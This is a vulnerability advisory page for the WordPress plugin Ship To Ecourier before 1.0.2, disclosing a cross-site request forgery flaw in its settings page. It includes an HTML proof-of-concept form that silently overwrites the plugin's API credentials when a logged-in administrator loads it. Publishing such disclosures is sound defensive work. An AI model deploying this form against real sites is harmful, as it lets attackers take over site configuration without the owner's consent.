WordPress Plugin Vulnerabilities

Ship To Ecourier < 1.0.2 - Plugin's Settings Update via CSRF

Description

The plugin did not properly check for CSRF, allowing attackers to make a logged in administrator update the plugin's settings

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=ship-to-ecourier" method="POST">
      <input type="hidden" name="user_id" value="Attacker" />
      <input type="hidden" name="api_key" value="CSRF" />
      <input type="hidden" name="api_secret" value="Attacker" />
      <input type="hidden" name="api_environment" value="staging" />
      <input type="hidden" name="submit_ste_ecourier_settings" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 1.0.2

Classification

Miscellaneous

Original Researcher
WPScanTeam
Verified
Yes

Timeline

Publicly Published
2021-05-05 (about 3 years ago)
Added
2021-05-05 (about 3 years ago)
Last Updated
2021-05-05 (about 3 years ago)

Other